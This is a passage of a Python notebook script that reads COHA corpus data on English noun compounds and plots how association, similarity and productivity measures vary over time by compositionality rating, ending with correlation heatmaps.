dimension)\nconstituentsfile = \"../../../Compounding/datasets/heads.pkl\"\n\nfeatures=pd.read_csv(featurefile, sep=\"\\t\")\nfeatures['compound_rating']=''\nfeatures.loc[features.compound_mean>=4,'compound_rating']='high-rated'\nfeatures.loc[(features.compound_mean>=2) & (features.compound_mean<4),'compound_rating']='med-rated'\nfeatures.loc[features.compound_mean<2,'compound_rating']='low-rated'\nfeatures = 
features[features.compound_rating != \"med-rated\"]\nfeatures.compound_rating.value_counts()\n\nfeatures\n\nfeatures.loc[(features[\"modifier\"] == \"web\") & (features[\"head\"] == \"site\")]\n\nto_add_cols=['compound_mean','compound_rating']\nlmi_cols = [col for col in features.columns if 'local_mi' in col]\nllr_cols = [col for col in features.columns if 'log_ratio' in col]\nppmi_cols = [col for col in features.columns if 'ppmi' in col]\nsim_bw_constituents_cols = [col for col in features.columns if 'sim_bw_constituents' in col]\nsim_with_head_cols = [col for col in features.columns if 'sim_with_head' in col]\nsim_with_modifier_cols = [col for col in features.columns if 'sim_with_modifier' in col]\nhead_prod_cols = [col for col in features.columns if 'head_prod' in col]\nmod_prod_cols = [col for col in features.columns if 'mod_prod' in col]\n#selected_compounds=['health insurance','silver bullet','melting pot','gold mine','swimming pool','bank account']\n#assert (len(lmi_cols)+len(llr_cols)+len(ppmi_cols)+len(sim_bw_constituents_cols)+len(sim_with_head_cols)+len(sim_with_modifier_cols))==(len(features.columns))\n\n# Function to get dataframe for plotting for each feature group\ndef get_plot_df(feature_group_columns):\n df=features.set_index([\"modifier\", \"head\"])[feature_group_columns+to_add_cols]\n df.reset_index(inplace=True)\n df['compound']=df['modifier']+' '+df['head']\n df.drop(['modifier','head'],axis=1,inplace=True)\n df.set_index('compound',inplace=True)\n old_vars=[x.split(':')[1] for x in df.columns if 'compound' not in x]\n df.columns=old_vars+to_add_cols\n df.reset_index(inplace=True)\n plot_df=pd.melt(df,id_vars=['compound','compound_rating','compound_mean'],\n value_vars=old_vars)\n return plot_df\n\n\n# Function to save plots to dir\ndef save_plots(g, file_prefix):\n plt.setp(g.get_xticklabels(), rotation=60)\n plt.savefig(plotdir+file_prefix+'_{}_{}_{}_{}_{}_{}.png'.format(mode, ppmi_preprocess, tagged, timespan, cutoff, medianImpute), dpi=300)\n plt.savefig(plotdir+file_prefix+'_{}_{}_{}_{}_{}_{}.jpg'.format(mode, ppmi_preprocess, tagged, timespan, cutoff, medianImpute), dpi=300)\n plt.savefig(plotdir+file_prefix+'_{}_{}_{}_{}_{}_{}.tiff'.format(mode, ppmi_preprocess, tagged, timespan, cutoff, medianImpute), dpi=300)\n if use_pgf:\n plt.savefig(plotdir+file_prefix+'_{}_{}_{}_{}_{}_{}.pgf'.format(mode, ppmi_preprocess, tagged, timespan, cutoff, medianImpute))\n\n\nplot_head_prod_df = get_plot_df(head_prod_cols)\nplot_head_prod_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_head_prod_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.legend(loc='upper left')\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"Productivity of Head\")\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'head_prod_merged')\n\nplot_mod_prod_df = get_plot_df(mod_prod_cols)\nplot_mod_prod_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_mod_prod_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", 
ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"Productivity of Modifier\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'modprod_merged')\n\nplot_lmi_df = get_plot_df(lmi_cols)\nplot_lmi_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_lmi_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"LMI\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'LMI_merged')\n\nplot_llr_df = get_plot_df(llr_cols)\nplot_llr_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_llr_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"LLR\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'LLR_merged')\n\nplot_ppmi_df = get_plot_df(ppmi_cols)\nplot_ppmi_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_ppmi_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"PPMI\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'PPMI_merged')\n\nplot_sim_bw_constituents_df = get_plot_df(sim_bw_constituents_cols)\nplot_sim_bw_constituents_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_sim_bw_constituents_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"Similarity between constituents\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'sim-bw-const_merged')\n\nplot_sim_with_head_df = get_plot_df(sim_with_head_cols)\nplot_sim_with_head_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_sim_with_head_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"Similarity with head\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'sim-with-head_merged')\n\nplot_sim_with_modifier_df = 
get_plot_df(sim_with_modifier_cols)\nplot_sim_with_modifier_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_sim_with_modifier_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"Similarity with modifier\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'sim-with-mod_merged')\n\ncompounds=pd.read_pickle(compoundfile)\ncompounds[\"compound\"] = compounds[\"modifier\"].str.split(\"_\").str[0]+\" \"+compounds[\"head\"].str.split(\"_\").str[0]\ncompounds = compounds.groupby([\"compound\", \"modifier\", \"head\", \"year\"])[[\"count\"]].agg(\"sum\").reset_index()\ncompounds.head()\n\nmerge_df_aware=features[['modifier','head','compound_rating']].merge(compounds.reset_index(),on=['modifier','head'],how='inner')\n#merge_df_aware.set_index([\"modifier\", \"head\",'year','compound_rating'], inplace = True)\nmerge_df_aware.head()\n\n\ndef cosine(row1,row2):\n if row1.name[:-2]!=row2.name[:-2]:\n return np.nan\n else:\n denom1=np.sqrt(np.sum(np.square(row1)))\n denom2=np.sqrt(np.sum(np.square(row2)))\n num=np.sum(row1*row2)\n return num/(denom1*denom2)\n\n\ncosine(merge_df_aware.iloc[2-1],merge_df_aware.iloc[2])\n\ncosine_compound_agnostic=[np.nan]\nfor i in range(1,merge_df_aware.shape[0]):\n cosine_compound_agnostic.append(cosine(merge_df_aware.iloc[i-1],merge_df_aware.iloc[i]))\n\nmerge_df_aware['compound_cosine']=cosine_compound_agnostic\ncompound_df=pd.pivot_table(merge_df_aware.reset_index(), values = 'compound_cosine', index=['modifier','head','compound_rating'], columns = 'time')\n\ncompound_df.reset_index(inplace=True)\ncompound_df['compound']=compound_df['modifier'].str[:-5]+' '+compound_df['head'].str[:-5]\ncompound_df.drop(['modifier','head'],axis=1,inplace=True)\n#plot_compound_df=plot_compound_df.loc[plot_compound_df['compound'].isin(selected_compounds)]\n#compound_df.set_index('compound',inplace=True)\n#plot_compound_df=plot_compound_df[plot_compound_df.columns[10:]]\nplot_compound_df=pd.melt(compound_df,id_vars=['compound','compound_rating'],\n value_vars=[c for c in compound_df.columns if c not in (\"compound_rating\", \"compound\")])\n\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"time\", y=\"value\", hue=\"compound_rating\", hue_order=[\"low\", \"med\", \"high\"],style=\"compound_rating\",data=plot_compound_df,palette=\"Dark2\",linewidth=1,dashes=False)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"Compound cosine\")\n#g.legend(title='Compound Rating', loc='upper left', labels=[\"high\", \"low\", \"med\"])\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\ng.set_xlim(1900, 2009)\nplt.savefig(plotdir+'compound-cosine_{}_{}_{}_{}.png'.format(mode, timespan, cutoff, dimension), dpi=300)\nplt.savefig(plotdir+'compound-cosine_{}_{}_{}_{}.jpg'.format(mode, timespan, cutoff, dimension), dpi=300)\nplt.savefig(plotdir+'compound-cosine_{}_{}_{}_{}.tiff'.format(mode, timespan, cutoff, dimension), dpi=300)\nif use_pgf:\n plt.savefig(plotdir+'compound-cosine_{}_{}_{}_{}.pgf'.format(mode, timespan, cutoff, 
dimension))\n\nheads=pd.read_pickle(constituentsfile)\n#heads.index.set_names('head',level=0,inplace=True)\nheads.head()\n\nmerge_df_aware_heads=features[['modifier','head']].merge(heads.reset_index(),on=['head'],how='inner')\nmerge_df_aware_heads.set_index([\"modifier\", \"head\",'time'], inplace = True)\nmerge_df_aware_heads.head()\n\ncosine_head_agnostic=[np.nan]\nfor i in range(1,merge_df_aware_heads.shape[0]):\n cosine_head_agnostic.append(cosine(merge_df_aware_heads.iloc[i-1],merge_df_aware_heads.iloc[i]))\n\n\nmerge_df_aware_heads['head_cosine']=cosine_head_agnostic\nhead_df=pd.pivot_table(merge_df_aware_heads.reset_index(), values = 'head_cosine', index=['modifier','head'], columns = 'time')\n\nplot_head_df=head_df.reset_index()\nplot_head_df['compound']=plot_head_df['modifier'].str[:-5]+' '+plot_head_df['head'].str[:-5]\nplot_head_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_head_df.set_index('compound',inplace=True)\n\n# Add counts\ncompounds=pd.read_csv(\"../../../Compounding/coha_compounds/compounds.csv\",sep=\"\\t\")\ncompounds[\"compound\"] = compounds[\"modifier\"].str[:-5]+\" \"+compounds[\"head\"].str[:-5]\ncompounds = compounds.groupby([\"compound\", \"modifier\", \"head\", \"year\"])[[\"count\"]].agg(\"sum\").reset_index()\nmodifiers=pd.read_csv(\"../../../Compounding/coha_compounds/modifiers.csv\",sep=\"\\t\")\nmodifiers = modifiers.groupby([\"modifier\", \"year\"])[[\"count\"]].agg(\"sum\").reset_index()\nheads=pd.read_csv(\"../../../Compounding/coha_compounds/heads.csv\",sep=\"\\t\")\nheads = heads.groupby([\"head\", \"year\"])[[\"count\"]].agg(\"sum\").reset_index()\n\nmerge_df = pd.merge(compounds, modifiers, on=[\"modifier\", \"year\"])\nmerge_df = pd.merge(merge_df, heads, on=[\"head\", \"year\"])\nmerge_df = merge_df[[\"compound\",\"year\",\"count_x\",\"count_y\",\"count\"]]\nmerge_df.columns = [\"compound_surface\",\"year\", \"compound\",\"mod\",\"head\"]\nmerge_df = merge_df.groupby([\"compound_surface\", \"year\"])[[\"compound\", \"mod\", \"head\"]].agg(\"sum\").reset_index()\nmerge_df = pd.melt(merge_df, id_vars=[\"compound_surface\", \"year\"], var_name=\"type\", value_name=\"count\")\nmerge_df\n\n# +\nsim_with_head_df=features.set_index([\"modifier\", \"head\"])[sim_with_head_cols]\nsim_with_head_df.columns=[v.split(\":\")[1] for v in sim_with_head_df.columns]\nplot_sim_with_head_df=sim_with_head_df.reset_index()\nplot_sim_with_head_df['compound']=plot_sim_with_head_df['modifier']+' '+plot_sim_with_head_df['head']\nplot_sim_with_head_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_sim_with_head_df.set_index('compound',inplace=True)\nplot_sim_with_head_df = plot_sim_with_head_df.stack().reset_index()\nplot_sim_with_head_df.columns=[\"compound\", \"year\", \"value\"]\nplot_sim_with_head_df['Feature'] = \"sim_with_head\"\n\nsim_with_mod_df=features.set_index([\"modifier\", \"head\"])[sim_with_modifier_cols]\nsim_with_mod_df.columns=[v.split(\":\")[1] for v in sim_with_mod_df.columns]\nplot_sim_with_mod_df=sim_with_mod_df.reset_index()\nplot_sim_with_mod_df['compound']=plot_sim_with_mod_df['modifier']+' '+plot_sim_with_mod_df['head']\nplot_sim_with_mod_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_sim_with_mod_df.set_index('compound',inplace=True)\nplot_sim_with_mod_df = plot_sim_with_mod_df.stack().reset_index()\nplot_sim_with_mod_df.columns=[\"compound\", \"year\", \"value\"]\nplot_sim_with_mod_df['Feature'] = \"sim_with_mod\"\n\nsim_bw_const_df=features.set_index([\"modifier\", 
\"head\"])[sim_bw_constituents_cols]\nsim_bw_const_df.columns=[v.split(\":\")[1] for v in sim_bw_const_df.columns]\nplot_sim_bw_const_df=sim_bw_const_df.reset_index()\nplot_sim_bw_const_df['compound']=plot_sim_bw_const_df['modifier']+' '+plot_sim_bw_const_df['head']\nplot_sim_bw_const_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_sim_bw_const_df.set_index('compound',inplace=True)\nplot_sim_bw_const_df = plot_sim_bw_const_df.stack().reset_index()\nplot_sim_bw_const_df.columns=[\"compound\", \"year\", \"value\"]\nplot_sim_bw_const_df['Feature'] = \"sim_bw_constituents\"\n\nplot_sim_head_mod_df = plot_sim_with_head_df.append(plot_sim_with_mod_df)\nplot_sim_head_mod_df = plot_sim_head_mod_df.append(plot_sim_bw_const_df)\n\nplot_sim_head_mod_df = plot_sim_head_mod_df[plot_sim_head_mod_df.value != 0]\nplot_sim_head_mod_df.year = pd.to_numeric(plot_sim_head_mod_df.year)\n# -\n\nfor i in plot_sim_head_mod_df[[\"compound\"]].drop_duplicates().values.tolist():\n i = i[0]\n if compounds[compounds[[\"compound\"]] == i][\"count\"].sum() >= 200:\n print(i, compounds[compounds.compound == i][\"count\"].sum())\n\nfor i in plot_sim_head_mod_df.compound.unique():\n if i == \"guinea pig\":\n #if compounds[compounds.compound == i][\"count\"].sum() >= 200:\n #fig, ax = plt.subplots(1, 2, figsize=(20,10))\n plt.figure(figsize=(15,15))\n \"\"\"\n h=sns.lineplot(x = \"year\", y = \"count\", data=merge_df.loc[merge_df['compound_surface'] == i],\n style = \"type\",\n hue = \"type\",\n markers=['o', '<', '>'],\n dashes = False,\n palette = \"Paired\",\n ax = ax[0])\n h.set_title(i)\n \"\"\"\n g=sns.lineplot(x = \"year\", y = \"value\", data=plot_sim_head_mod_df.loc[plot_sim_head_mod_df['compound'] == i],\n hue = \"Feature\",\n style = \"Feature\",\n #palette=\"Set2\", \n markers=['o', '<', '>'],\n linewidth = 2,\n legend = \"brief\",\n dashes = False,\n sort = True,\n #ax = ax[1]\n )\n #g.legend(loc='center left', bbox_to_anchor=(1.25, 0.5), ncol=1)\n #g.xaxis.set_major_locator(ticker.MultipleLocator(20))\n g.set_title(\"Compound: \" + i.title())\n g.set_xlabel(\"Year\")\n g.set_ylabel(\"Feature Value\")\n plt.setp(g.get_xticklabels(), rotation=60)\n plt.savefig(plotdir+'single_compounds_sims_{}.png'.format(i), dpi=300)\n #plt.savefig(plotdir+'single_compounds_sims_{}.jpg'.format(i), dpi=300)\n #plt.savefig(plotdir+'single_compounds_sims_{}.tiff'.format(i), dpi=300)\n if use_pgf:\n plt.savefig(plotdir+'single_compounds_sims_{}.pgf'.format(i))\n plt.show()\n\n# +\nmod_prod_df=features.set_index([\"modifier\", \"head\"])[mod_prod_cols]\nmod_prod_df.columns=[v.split(\":\")[1] for v in mod_prod_df.columns]\nplot_mod_prod_df=mod_prod_df.reset_index()\nplot_mod_prod_df['compound']=plot_mod_prod_df['modifier']+' '+plot_mod_prod_df['head']\nplot_mod_prod_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_mod_prod_df.set_index('compound',inplace=True)\nplot_mod_prod_df = plot_mod_prod_df.stack().reset_index()\nplot_mod_prod_df.columns=[\"compound\", \"year\", \"value\"]\nplot_mod_prod_df['Feature'] = \"mod_prod\"\n\nhead_prod_df=features.set_index([\"modifier\", \"head\"])[head_prod_cols]\nhead_prod_df.columns=[v.split(\":\")[1] for v in head_prod_df.columns]\nplot_head_prod_df=head_prod_df.reset_index()\nplot_head_prod_df['compound']=plot_head_prod_df['modifier']+' '+plot_head_prod_df['head']\nplot_head_prod_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_head_prod_df.set_index('compound',inplace=True)\nplot_head_prod_df = plot_head_prod_df.stack().reset_index()\nplot_head_prod_df.columns=[\"compound\", 
\"year\", \"value\"]\nplot_head_prod_df['Feature'] = \"head_prod\"\n\nplot_prod_head_mod_df = plot_mod_prod_df.append(plot_head_prod_df)\n\nplot_prod_head_mod_df = plot_prod_head_mod_df[plot_prod_head_mod_df.value != 0]\n# -\n\nfor i in plot_prod_head_mod_df.compound.unique():\n #if compounds[compounds.compound == i][\"count\"].sum() >= 200:\n #fig, ax = plt.subplots(1,2, figsize=(20,10))\n plt.figure(figsize=(15,15))\n \"\"\"\n h=sns.lineplot(x = \"year\", y = \"count\", data=merge_df.loc[merge_df['compound_surface'] == i],\n style = \"type\",\n hue = \"type\",\n markers=['o', '<', '>'],\n dashes = False,\n palette = \"Paired\",\n ax = ax[0])\n h.set_title(i)\n \"\"\"\n g=sns.lineplot(x = \"year\", y = \"value\", data=plot_prod_head_mod_df.loc[plot_prod_head_mod_df['compound'] == i],\n hue = \"Feature\",\n style = \"Feature\",\n #palette=\"Set2\", \n markers=['o', '<'],\n linewidth = 2,\n legend = \"brief\",\n dashes = False,\n #ax = ax[1]\n )\n #g.legend(loc='center left', bbox_to_anchor=(1.25, 0.5), ncol=1)\n #g.xaxis.set_major_locator(ticker.MultipleLocator(20))\n g.set_title(\"Compound: \" + i.title())\n g.set_xlabel(\"Year\")\n g.set_ylabel(\"Feature Value\")\n plt.setp(g.get_xticklabels(), rotation=60)\n plt.savefig(plotdir+'single_compounds_prod_{}.png'.format(i), dpi=300)\n #plt.savefig(plotdir+'single_compounds_prod_{}.jpg'.format(i), dpi=300)\n #plt.savefig(plotdir+'single_compounds_prod_{}.tiff'.format(i), dpi=300)\n if use_pgf:\n plt.savefig(plotdir+'single_compounds_prod_{}.pgf'.format(i))\n\n# +\nlmi_df=features.set_index([\"modifier\", \"head\"])[lmi_cols]\nlmi_df.columns=[v.split(\":\")[1] for v in lmi_df.columns]\nplot_lmi_df=lmi_df.reset_index()\nplot_lmi_df['compound']=plot_lmi_df['modifier']+' '+plot_lmi_df['head']\nplot_lmi_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_lmi_df.set_index('compound',inplace=True)\nplot_lmi_df = plot_lmi_df.stack().reset_index()\nplot_lmi_df.columns=[\"compound\", \"year\", \"value\"]\nplot_lmi_df['Feature'] = \"lmi\"\n\nllr_df=features.set_index([\"modifier\", \"head\"])[llr_cols]\nllr_df.columns=[v.split(\":\")[1] for v in llr_df.columns]\nplot_llr_df=llr_df.reset_index()\nplot_llr_df['compound']=plot_llr_df['modifier']+' '+plot_llr_df['head']\nplot_llr_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_llr_df.set_index('compound',inplace=True)\nplot_llr_df = plot_llr_df.stack().reset_index()\nplot_llr_df.columns=[\"compound\", \"year\", \"value\"]\nplot_llr_df['Feature'] = \"llr\"\n\nppmi_df=features.set_index([\"modifier\", \"head\"])[ppmi_cols]\nppmi_df.columns=[v.split(\":\")[1] for v in ppmi_df.columns]\nplot_ppmi_df=ppmi_df.reset_index()\nplot_ppmi_df['compound']=plot_ppmi_df['modifier']+' '+plot_ppmi_df['head']\nplot_ppmi_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_ppmi_df.set_index('compound',inplace=True)\nplot_ppmi_df = plot_ppmi_df.stack().reset_index()\nplot_ppmi_df.columns=[\"compound\", \"year\", \"value\"]\nplot_ppmi_df['Feature'] = \"ppmi\"\n\nplot_info_df = plot_lmi_df.append(plot_llr_df)\nplot_info_df = plot_info_df.append(plot_ppmi_df)\n\nplot_info_df = plot_info_df[plot_info_df.value != 0]\nplot_info_df.year = pd.to_numeric(plot_info_df.year)\n# -\n\nfor i in plot_info_df.compound.unique():\n if i == \"guinea pig\":\n #if compounds[compounds.compound == i][\"count\"].sum() >= 200:\n #fig, ax = plt.subplots(1,2, figsize=(20,10))\n plt.figure(figsize=(15,15))\n \"\"\"\n h=sns.lineplot(x = \"year\", y = \"count\", data=merge_df.loc[merge_df['compound_surface'] == i],\n style = \"type\",\n hue = 
\"type\",\n markers=['o', '<', '>'],\n dashes = False,\n palette = \"Paired\",\n ax = ax[0])\n h.set_title(i)\n \"\"\"\n g=sns.lineplot(x = \"year\", y = \"value\", data=plot_info_df.loc[plot_info_df['compound'] == i],\n hue = \"Feature\",\n style = \"Feature\",\n #palette=\"Set2\", \n markers=['o', '<', '>'],\n linewidth = 2,\n legend = \"brief\",\n dashes = False,\n #ax = ax[1]\n )\n #g.legend(loc='center left', bbox_to_anchor=(1.25, 0.5), ncol=1)\n #g.xaxis.set_major_locator(ticker.MultipleLocator(20))\n g.set_title(\"Compound: \" + i.title())\n g.set_xlabel(\"Year\")\n g.set_ylabel(\"Feature Value\")\n plt.setp(g.get_xticklabels(), rotation=60)\n plt.savefig(plotdir+'single_compounds_inf_{}.png'.format(i), dpi=300)\n #plt.savefig(plotdir+'single_compounds_inf_{}.jpg'.format(i), dpi=300)\n #plt.savefig(plotdir+'single_compounds_inf_{}.tiff'.format(i), dpi=300)\n if use_pgf:\n plt.savefig(plotdir+'single_compounds_inf_{}.pgf'.format(i))\n\nplot_features_df = pd.concat([plot_info_df, plot_prod_head_mod_df, plot_sim_head_mod_df])\n\nyear_token_counts = pd.read_csv('../../data/coha_year_token_count.csv')\nyear_token_counts.columns = ['year', 'tokencount']\nyear_token_counts\n\nplot_count_df = compounds[compounds.compound.isin(plot_features_df.compound.unique())]\nplot_count_df = pd.merge(plot_count_df, plot_sim_with_modifier_df[[\"compound\",\"Compositionality Rating\"]], on=\"compound\")\nplot_count_df = plot_count_df.merge(year_token_counts, on='year')\nplot_count_df[\"normcount\"] = plot_count_df[\"count\"]/plot_count_df[\"tokencount\"]\nplot_count_df[\"normcount\"].fillna(0, inplace=True)\nplot_count_df[\"normcount\"] -= plot_count_df[\"normcount\"].min()\nplot_count_df[\"normcount\"] /= plot_count_df[\"normcount\"].max()\nplot_count_df\n\nplot_count_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"year\", y=\"normcount\", hue=\"Compositionality Rating\", hue_order=[\"low\", \"med\", \"high\"], style=\"Compositionality Rating\",data=plot_count_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"Normalized Count\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nplt.setp(g.get_xticklabels(), rotation=60)\nplt.savefig(plotdir+'compound-counts-merged_{}_{}_{}_{}.png'.format(mode, timespan, cutoff, dimension), dpi=300)\nplt.savefig(plotdir+'compound-counts-merged_{}_{}_{}_{}.jpg'.format(mode, timespan, cutoff, dimension), dpi=300)\nplt.savefig(plotdir+'compound-counts-merged_{}_{}_{}_{}.tiff'.format(mode, timespan, cutoff, dimension), dpi=300)\nif use_pgf:\n plt.savefig(plotdir+'compound-counts-merged_{}_{}_{}_{}.pgf'.format(mode, timespan, cutoff, dimension))\n\nplot_comp_ratings_df = features[[\"modifier\", \"head\", \"modifier_mean\", \"head_mean\", \"compound_mean\"]]\nplot_comp_ratings_df[\"year\"] = 2000\nplot_comp_ratings_df['compound']=plot_comp_ratings_df['modifier'].str[:-5]+' '+plot_comp_ratings_df['head'].str[:-5]\nplot_comp_ratings_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_comp_ratings_df = pd.melt(plot_comp_ratings_df, id_vars=[\"year\",\"compound\"],\n value_vars=['modifier_mean', 'head_mean', 'compound_mean'])\nplot_comp_ratings_df.rename(columns = {'variable':'Feature'}, inplace = True)\nplot_comp_ratings_df = plot_comp_ratings_df[['compound', 'year', 'value', 'Feature']]\nplot_comp_ratings_df\n\ncorr_count_df = 
plot_count_df[[\"compound\",\"year\",\"count\"]]\ncorr_count_df[\"Feature\"] = \"count\"\ncorr_count_df.rename(columns = {'count':'value'}, inplace = True)\ncorr_count_df = pd.concat([plot_features_df, corr_count_df])\ncorr_count_df = pd.concat([plot_comp_ratings_df ,corr_count_df])\ncorr_count_df.drop_duplicates(inplace=True)\ncorr_count_df['year'] = pd.to_numeric(corr_count_df['year'])\ncorr_count_df = corr_count_df.pivot_table(values=['value'], index=['year','compound'], columns=['Feature'])\ncorr_count_df.columns = corr_count_df.columns.get_level_values(1)\ncorr_count_df = corr_count_df[[\"count\", \"compound_mean\", \"head_mean\", \"modifier_mean\", \"sim_with_head\", \"sim_with_mod\", \"head_prod\", \"mod_prod\",\n \"lmi\", \"llr\", \"ppmi\"]]\ncorr_count_df\n\nmask = np.zeros_like(corr_count_df.corr())\nmask[np.triu_indices_from(mask, k=1)] = True\nplt.figure(figsize=(25, 25))\ng = sns.heatmap(corr_count_df.corr(), annot=True, vmin=-1, vmax=1, cmap=\"YlGnBu\", mask=mask, cbar=False)\nplt.savefig(plotdir+'corr_{}_{}_{}_{}.png'.format(mode, timespan, cutoff, dimension), dpi=300)\nplt.savefig(plotdir+'corr_{}_{}_{}_{}.jpg'.format(mode, timespan, cutoff, dimension), dpi=300)\nplt.savefig(plotdir+'corr_{}_{}_{}_{}.tiff'.format(mode, timespan, cutoff, dimension), dpi=300)\nif use_pgf:\n plt.savefig(plotdir+'corr_{}_{}_{}_{}.pgf'.format(mode, timespan, cutoff, dimension))\n\nfor year, new_df in corr_count_df.groupby(level=0):\n mask = np.zeros_like(new_df.corr())\n mask[np.triu_indices_from(mask, k=1)] = True\n plt.figure(figsize=(25, 25))\n g = sns.heatmap(new_df.corr(), annot=True, vmin=-1, vmax=1, cmap=\"YlGnBu\", mask=mask, cbar=False)\n g.set_title(\"Correlations for time span {}\".format(year))\n plt.savefig(plotdir+'corr-{}_{}_{}_{}_{}.png'.format(year, mode, timespan, cutoff, dimension), dpi=300)\n plt.savefig(plotdir+'corr-{}_{}_{}_{}_{}.jpg'.format(year, mode, timespan, cutoff, dimension), dpi=300)\n plt.savefig(plotdir+'corr-{}_{}_{}_{}_{}.tiff'.format(year, mode, timespan, cutoff, dimension), dpi=300)\n if use_pgf:\n plt.savefig(plotdir+'corr-{}_{}_{}_{}_{}.pgf'.format(year, mode, timespan, cutoff, dimension))\n","repo_name":"prajitdhar/Compounding","sub_path":"compositionality_over_time/Notebooks/coha_vis.ipynb","file_name":"coha_vis.ipynb","file_ext":"py","file_size_in_byte":29336,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"496779257","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + [markdown] id=\"f8117f57\"\n# # Transformer Puzzles\n\n# + [markdown] 